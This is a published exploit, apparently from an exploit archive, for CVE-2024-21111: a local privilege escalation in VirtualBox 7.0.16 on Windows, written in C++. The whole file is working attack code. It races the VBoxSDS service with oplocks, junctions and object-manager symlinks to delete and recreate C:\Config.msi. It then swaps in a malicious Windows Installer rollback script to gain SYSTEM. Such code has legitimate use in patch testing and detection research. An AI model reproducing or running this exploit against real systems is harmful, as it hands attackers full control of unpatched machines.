# Exploit Title: VirtualBox 7.0.16 - Privilege Escalation
# Date: 2025-05-06
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win x64
# CVE : CVE-2024-21111
#include <Windows.h>
#include <Shlwapi.h>
#include <WtsApi32.h>
#include <Msi.h>
#include <PathCch.h>
#include <AclAPI.h>
#include <iostream>
#include "resource.h"
#include "def.h"
#include "FileOplock.h"
#pragma comment(lib, "Msi.lib")
#pragma comment(lib, "Shlwapi.lib")
#pragma comment(lib, "wtsapi32")
#pragma comment(lib, "PathCch.lib")
#pragma comment(lib, "rpcrt4.lib")
#pragma warning(disable:4996)
struct __declspec(uuid("74AB5FFE-8726-4435-AA7E-876D705BCBA5"))
CLSID_VBoxSDS;
FileOpLock* oplock;
HANDLE hFile, vb11, h;
HANDLE hthread;
NTSTATUS retcode;
HMODULE hm = GetModuleHandle(NULL);
HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_RBS1), L"rbs");
DWORD RbsSize = SizeofResource(hm, res);
void* RbsBuff = LoadResource(hm, res);
WCHAR dir[MAX_PATH] = { 0x0 };
wchar_t filen[MAX_PATH] = { 0x0 };
DWORD WINAPI install(void*);
BOOL Move(HANDLE hFile);
void callback();
HANDLE getDirectoryHandle(LPWSTR file, DWORD access, DWORD share, DWORD
dispostion);
LPWSTR BuildPath(LPCWSTR path);
void loadapis();
VOID cb1();
VOID cb0();
BOOL Monitor(HANDLE hDir);
BOOL clearDataDir();
BOOL CreateJunction(LPCWSTR dir, LPCWSTR target) {
HANDLE hJunction;
DWORD cb;
wchar_t printname[] = L"";
HANDLE hDir;
hDir = CreateFile(dir, FILE_WRITE_ATTRIBUTES, FILE_SHARE_READ, NULL,
OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (hDir == INVALID_HANDLE_VALUE) {
printf("[!] Failed to obtain handle on directory %ls.\n", dir);
return FALSE;
}
SIZE_T TargetLen = wcslen(target) * sizeof(WCHAR);
SIZE_T PrintnameLen = wcslen(printname) * sizeof(WCHAR);
SIZE_T PathLen = TargetLen + PrintnameLen + 12;
SIZE_T Totalsize = PathLen + (DWORD)(FIELD_OFFSET(REPARSE_DATA_BUFFER,
GenericReparseBuffer.DataBuffer));
PREPARSE_DATA_BUFFER Data = (PREPARSE_DATA_BUFFER)malloc(Totalsize);
Data->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
Data->ReparseDataLength = PathLen;
Data->Reserved = 0;
Data->MountPointReparseBuffer.SubstituteNameOffset = 0;
Data->MountPointReparseBuffer.SubstituteNameLength = TargetLen;
memcpy(Data->MountPointReparseBuffer.PathBuffer, target, TargetLen + 2);
Data->MountPointReparseBuffer.PrintNameOffset = (USHORT)(TargetLen + 2);
Data->MountPointReparseBuffer.PrintNameLength = (USHORT)PrintnameLen;
memcpy(Data->MountPointReparseBuffer.PathBuffer + wcslen(target) + 1,
printname, PrintnameLen + 2);
if (DeviceIoControl(hDir, FSCTL_SET_REPARSE_POINT, Data, Totalsize, NULL,
0, &cb, NULL) != 0)
{
printf("[+] Junction %ls -> %ls created!\n", dir, target);
free(Data);
return TRUE;
}
else
{
printf("[!] Error: %d. Exiting\n", GetLastError());
free(Data);
return FALSE;
}
}
BOOL DeleteJunction(LPCWSTR path) {
REPARSE_GUID_DATA_BUFFER buffer = { 0 };
BOOL ret;
buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
DWORD cb = 0;
IO_STATUS_BLOCK io;
HANDLE hDir;
hDir = CreateFile(path, FILE_WRITE_ATTRIBUTES, FILE_SHARE_READ, NULL,
OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS | FILE_OPEN_REPARSE_POINT, NULL);
if (hDir == INVALID_HANDLE_VALUE) {
printf("[!] Failed to obtain handle on directory %ls.\n", path);
printf("%d\n", GetLastError());
return FALSE;
}
ret = DeviceIoControl(hDir, FSCTL_DELETE_REPARSE_POINT, &buffer,
REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, NULL, NULL, &cb, NULL);
if (ret == 0) {
printf("Error: %d\n", GetLastError());
return FALSE;
}
else
{
printf("[+] Junction %ls delete!\n", dir);
return TRUE;
}
}
BOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, object,
target)) {
printf("[+] Symlink %ls -> %ls created!\n", object, target);
return TRUE;
}
else
{
printf("error :%d\n", GetLastError());
return FALSE;
}
}
BOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH |
DDD_REMOVE_DEFINITION | DDD_EXACT_MATCH_ON_REMOVE, object, target)) {
printf("[+] Symlink %ls -> %ls deleted!\n", object, target);
return TRUE;
}
else
{
printf("error :%d\n", GetLastError());
return FALSE;
}
}
void runSDS(int delay) {
if (delay == 1) {
printf("[!] sleeping for 2 sec\n");
Sleep(2000);
}
CoInitialize(NULL);
LPVOID ppv;
// 1st trigger to create VBoxSDS.log dir
CoCreateInstance(__uuidof(CLSID_VBoxSDS), 0, CLSCTX_LOCAL_SERVER,
IID_IUnknown, &ppv);
CoUninitialize();
}
BOOL checkSDSLog() {
BOOL clear = FALSE;
std::wstring vboxDataDir = L"C:\\ProgramData\\VirtualBox\\VBoxSDS.log.*";
HANDLE hFind;
WIN32_FIND_DATA data;
hFind = FindFirstFile(LPCWSTR(vboxDataDir.c_str()), &data);
// iterate first VBoxSDS.log
FindNextFile(hFind, &data);
if (hFind != INVALID_HANDLE_VALUE) {
do {
if (wcswcs(data.cFileName, L"VBoxSDS.log.")) {
runSDS(0);
//wprintf(L"%s\n", data.cFileName);
}
else {
printf("[+] Logs have been cleared!\n");
clear = TRUE;
}
//wprintf(L"%s\n", data.cFileName);
} while (FindNextFile(hFind, &data));
FindClose(hFind);
}
//printf("CLEAR: %d\n", clear);
return clear;
}
BOOL enumProc(const wchar_t* procName) {
PWTS_PROCESS_INFO processes{};
BOOL ok = FALSE;
DWORD count;
if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, NULL, 1, &processes,
&count)) {
for (DWORD i = 0; i < count; i++) {
if (wcswcs(processes[i].pProcessName, procName)) {
wprintf(L"[!] Process active: %s with PID %d\n",
processes[i].pProcessName, processes[i].ProcessId);
ok = TRUE;
break;
}
}
}
else {
printf("err: %d\n", GetLastError());
}
WTSFreeMemory(processes);
return ok;
}
void checkIfExists() {
if (enumProc(L"VirtualBoxVM.exe")) {
printf("[!] You seem to have active VMs running, please stop them before
running this to prevent corruption of any saved data of the VMs.\n");
exit(1);
}
if (enumProc(L"VirtualBox.exe")) {
printf("[!] VirtualBox process active\n");
// message
printf("[!] Trying to exit virtualbox by postmessage close window\n");
PostMessage(FindWindow(NULL, TEXT("Oracle VM VirtualBox Manager")),
WM_CLOSE, NULL, NULL);
printf("[!] Letting VBoxSDS exit (wait 12 seconds)\n\n");
Sleep(12000);
if (enumProc(L"VBoxSDS.exe")) {
printf("[-] error stopping vboxsds\n");
exit(1);
}
else {
printf("[+] Success stopping vboxsds!\n");
}
}
}
BOOL clearDataDir() {
do {
vb11 = CreateFile(L"C:\\ProgramData\\VirtualBox\\VBoxSDS.log.11", DELETE,
FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_ALWAYS,
FILE_FLAG_OVERLAPPED, NULL);
printf("h: %x %d\n", vb11, GetLastError());
} while (vb11 == INVALID_HANDLE_VALUE);
oplock = FileOpLock::CreateLock(vb11, cb1);
if (oplock != NULL) {
HANDLE c = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)runSDS, NULL, 0,
NULL);
oplock->WaitForLock(INFINITE);
CloseHandle(c);
}
BOOL isEmpty = FALSE;
do {
isEmpty = checkSDSLog();
} while (isEmpty == FALSE);
if (!RemoveDirectory(L"C:\\ProgramData\\VirtualBox\\VBoxSDS.log")) {
printf("error removing vboxlog dir\n");
exit(1);
}
return isEmpty;
}
int wmain() {
loadapis();
checkIfExists();
clearDataDir();
hFile = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ |
DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF);
if (hFile == INVALID_HANDLE_VALUE)
{
printf("[!] Failed to create C:\\Config.msi directory. Trying to delete
it.\n");
install(NULL);
hFile = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ |
DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF);
if (hFile != INVALID_HANDLE_VALUE)
{
printf("[+] Successfully removed and recreated C:\\Config.Msi.\n");
}
else
{
printf("[!] Failed. Cannot remove c:\\Config.msi");
//return 1;
}
}
if (!PathIsDirectoryEmpty(L"C:\\Config.Msi"))
{
printf("[!] Failed. C:\\Config.Msi already exists and is not empty.\n");
//return 1;
}
printf("[+] Config.msi directory created!\n");
HANDLE hDir =
getDirectoryHandle(BuildPath(L"C:\\ProgramData\\VirtualBox"), GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF);
printf("hDir: %x\n", hDir);
//Monitor(hDir);
HANDLE zxc{};
zxc = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Monitor, hDir, 0,
NULL);
SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
SetThreadPriorityBoost(GetCurrentThread(), TRUE); // This lets us maintain
express control of our priority
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
oplock = FileOpLock::CreateLock(hFile, callback);
if (oplock != nullptr) {
oplock->WaitForLock(INFINITE);
delete oplock;
}
do {
hFile = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ |
WRITE_DAC | READ_CONTROL | DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE |
FILE_SHARE_DELETE, FILE_OPEN_IF);
} while (!hFile);
char buff[4096];
DWORD retbt = 0;
FILE_NOTIFY_INFORMATION* fn;
WCHAR* extension;
WCHAR* extension2;
do {
ReadDirectoryChangesW(hFile, buff, sizeof(buff) - sizeof(WCHAR), TRUE,
FILE_NOTIFY_CHANGE_FILE_NAME,
&retbt, NULL, NULL);
fn = (FILE_NOTIFY_INFORMATION*)buff;
size_t sz = fn->FileNameLength / sizeof(WCHAR);
fn->FileName[sz] = '\0';
extension = fn->FileName;
PathCchFindExtension(extension, MAX_PATH, &extension2);
} while (wcscmp(extension2, L".rbs") != 0);
SetSecurityInfo(hFile, SE_FILE_OBJECT,
UNPROTECTED_DACL_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION, NULL,
NULL, NULL, NULL);
while (!Move(hFile)) {
}
HANDLE cfg_h = getDirectoryHandle(BuildPath(L"C:\\Config.msi"),
FILE_READ_DATA, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
FILE_CREATE);
WCHAR rbsfile[MAX_PATH];
_swprintf(rbsfile, L"C:\\Config.msi\\%s", fn->FileName);
HANDLE rbs = CreateFile(rbsfile, GENERIC_WRITE, FILE_SHARE_READ |
FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL, NULL);
if (WriteFile(rbs, RbsBuff, RbsSize, NULL, NULL)) {
printf("[+] Rollback script overwritten!\n");
}
else
{
printf("[!] Failed to overwrite rbs file!\n");
}
CloseHandle(rbs);
CloseHandle(cfg_h);
DeleteJunction(dir);
CloseHandle(zxc);
WCHAR asdfasdf[MAX_PATH];
_swprintf(asdfasdf, L"GLOBAL\\GLOBALROOT\\RPC Control\\%s", filen);
DelDosDeviceSymLink(asdfasdf, L"\\??\\C:\\Config.msi::$INDEX_ALLOCATION");
return 0;
}
DWORD WINAPI install(void*) {
HMODULE hm = GetModuleHandle(NULL);
HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_MSI1), L"msi");
wchar_t msipackage[MAX_PATH] = { 0x0 };
GetTempFileName(L"C:\\windows\\temp\\", L"MSI", 0, msipackage);
printf("[*] MSI file: %ls\n", msipackage);
DWORD MsiSize = SizeofResource(hm, res);
void* MsiBuff = LoadResource(hm, res);
HANDLE pkg = CreateFile(msipackage, GENERIC_WRITE | WRITE_DAC,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL,
CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
WriteFile(pkg, MsiBuff, MsiSize, NULL, NULL);
CloseHandle(pkg);
MsiSetInternalUI(INSTALLUILEVEL_NONE, NULL);
UINT a = MsiInstallProduct(msipackage, L"ACTION=INSTALL");
printf("%d\n", a);
MsiInstallProduct(msipackage, L"REMOVE=ALL");
DeleteFile(msipackage);
return 0;
}
BOOL Move(HANDLE hFile) {
if (hFile == INVALID_HANDLE_VALUE) {
printf("[!] Invalid handle!\n");
return FALSE;
}
wchar_t tmpfile[MAX_PATH] = { 0x0 };
RPC_WSTR str_uuid;
UUID uuid = { 0 };
UuidCreate(&uuid);
UuidToString(&uuid, &str_uuid);
_swprintf(tmpfile, L"\\??\\C:\\windows\\temp\\%s", str_uuid);
size_t buffer_sz = sizeof(FILE_RENAME_INFO) + (wcslen(tmpfile) *
sizeof(wchar_t));
FILE_RENAME_INFO* rename_info =
(FILE_RENAME_INFO*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY |
HEAP_GENERATE_EXCEPTIONS, buffer_sz);
IO_STATUS_BLOCK io = { 0 };
rename_info->ReplaceIfExists = TRUE;
rename_info->RootDirectory = NULL;
rename_info->Flags = 0x00000001 | 0x00000002 | 0x00000040;
rename_info->FileNameLength = wcslen(tmpfile) * sizeof(wchar_t);
memcpy(&rename_info->FileName[0], tmpfile, wcslen(tmpfile) *
sizeof(wchar_t));
NTSTATUS status = pNtSetInformationFile(hFile, &io, rename_info,
buffer_sz, 65);
if (status != 0) {
return FALSE;
}
return TRUE;
}
void callback() {
SetThreadPriority(GetCurrentThread(), REALTIME_PRIORITY_CLASS);
Move(hFile);
hthread = CreateThread(NULL, NULL, install, NULL, NULL, NULL);
HANDLE hd;
do {
hd = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN);
} while (!hd);
do {
CloseHandle(hd);
hd = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN);
} while (hd);
CloseHandle(hd);
do {
hd = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN);
CloseHandle(hd);
} while (retcode != 0xC0000022);
}
HANDLE getDirectoryHandle(LPWSTR file, DWORD access, DWORD share, DWORD
dispostion) {
UNICODE_STRING ufile;
HANDLE hDir;
pRtlInitUnicodeString(&ufile, file);
OBJECT_ATTRIBUTES oa = { 0 };
IO_STATUS_BLOCK io = { 0 };
InitializeObjectAttributes(&oa, &ufile, OBJ_CASE_INSENSITIVE, NULL, NULL);
retcode = pNtCreateFile(&hDir, access, &oa, &io, NULL,
FILE_ATTRIBUTE_NORMAL, share, dispostion, FILE_DIRECTORY_FILE |
FILE_OPEN_REPARSE_POINT, NULL, NULL);
if (!NT_SUCCESS(retcode)) {
return NULL;
}
return hDir;
}
LPWSTR BuildPath(LPCWSTR path) {
wchar_t ntpath[MAX_PATH];
swprintf(ntpath, L"\\??\\%s", path);
return ntpath;
}
void loadapis() {
HMODULE ntdll = GetModuleHandle(L"ntdll.dll");
if (ntdll != NULL) {
pRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(ntdll,
"RtlInitUnicodeString");
pNtCreateFile = (_NtCreateFile)GetProcAddress(ntdll, "NtCreateFile");
pNtSetInformationFile = (_NtSetInformationFile)GetProcAddress(ntdll,
"NtSetInformationFile");
}
if (pRtlInitUnicodeString == NULL || pNtCreateFile == NULL) {
printf("Cannot load api's %d\n", GetLastError());
exit(0);
}
}
void cb0() {
if (!Move(h)) {
printf("reached3\n");
exit(1);
}
printf("reached2\n");
_swprintf(dir, L"C:\\ProgramData\\VirtualBox");
if (!CreateJunction(BuildPath(dir), L"\\RPC Control")) {
printf("[!] Exiting!\n");
exit(1);
}
WCHAR asdfasdf[MAX_PATH];
_swprintf(asdfasdf, L"GLOBAL\\GLOBALROOT\\RPC Control\\%s", filen);
if (!DosDeviceSymLink(asdfasdf,
L"\\??\\C:\\Config.msi::$INDEX_ALLOCATION")) {
printf("zxc\n");
//printf("[!] Exiting!\n");
//exit(1);
}
}
void cb1() {
printf("[!] oplock triggered\n");
if (!Move(vb11)) {
printf("reached3\n");
exit(1);
}
if (!CreateDirectory(L"C:\\ProgramData\\VirtualBox\\VBoxSDS.log", NULL)) {
printf("Error creating dir. Exiting\n");
exit(1);
}
return;
}
BOOL Monitor(HANDLE hDir) {
printf("[!] Monitor called\n");
BOOL deleted = FALSE;
_swprintf(filen, L"VBoxSDS.log.11");
do {
do {
h = CreateFile(L"C:\\ProgramData\\VirtualBox\\VBoxSDS.log.11", DELETE,
FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_ALWAYS,
FILE_FLAG_OVERLAPPED, NULL);
printf("h: %x\n", h);
} while (h == INVALID_HANDLE_VALUE);
oplock = FileOpLock::CreateLock(h, cb0);
if (oplock != NULL) {
HANDLE c = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)runSDS,
(LPVOID)1, 0, NULL);
oplock->WaitForLock(INFINITE);
CloseHandle(c);
}
deleted = TRUE;
} while (deleted == FALSE);
return deleted;
}